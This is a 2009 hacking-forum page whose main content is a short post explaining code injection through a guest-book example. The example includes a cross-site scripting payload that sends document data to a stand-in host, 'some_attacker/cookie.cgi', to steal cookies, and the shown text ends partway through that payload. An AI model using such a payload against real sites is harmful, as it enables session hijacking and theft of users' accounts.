Search

Latest topics

» Request Info

Thu Sep 17, 2009 2:33 am by JeSTeR

» winagent.exe

Tue Sep 01, 2009 12:13 am by JeSTeR

» sissiBOT.exe

Mon Aug 31, 2009 11:42 pm by JeSTeR

» Posting Rules

Mon Aug 31, 2009 11:30 pm by JeSTeR

» There Are Hidden Posts Only Members Can Access

Sun Aug 23, 2009 1:05 am by JeSTeR

» IRC Server: IRC.HackersPlanet.Org

Wed Aug 19, 2009 9:42 pm by Shikamaru

» Rules For Posting

Wed Aug 19, 2009 9:35 pm by Shikamaru

» RootKit Downloads

Sun Jul 12, 2009 12:34 am by JeSTeR

» Anti-Rooting

Sun Jul 12, 2009 12:21 am by JeSTeR

Shopmotion

Navigation

Portal
Index
Memberlist
Profile
FAQ
Search

Forum

Affiliates

brothersoft.com

Premade Website Designs

Current date/time is Thu Nov 26, 2009 2:54 pm

Post a reply

Post a reply

Username

Subject

Height x Width

URL

URL

Label

YouTube YouTube Dailymotion Google Video

URL

Width x Height px

URL

Height x Width

URL

URL

Label

Width x Height px

URL

YouTube YouTube Dailymotion Google Video

URL

HTML is OFF
BBCode is ON
Smilies are ON

Options

Disable BBCode in this post
Disable Smilies in this post

Topic review

Code Injection Usages

by JeSTeR on Thu Jan 08, 2009 5:22 pm

Overview and example

A web server has a "Guest book" script, which accepts small messages from users, and typically receives messages such as

Nice site!

However a malicious person may know of a code injection vulnerability in the "Guest book", and enters a message such as

Nice Site, I think I'll take it.><script>document.location='http://some_attacker/cookie.cgi?' +document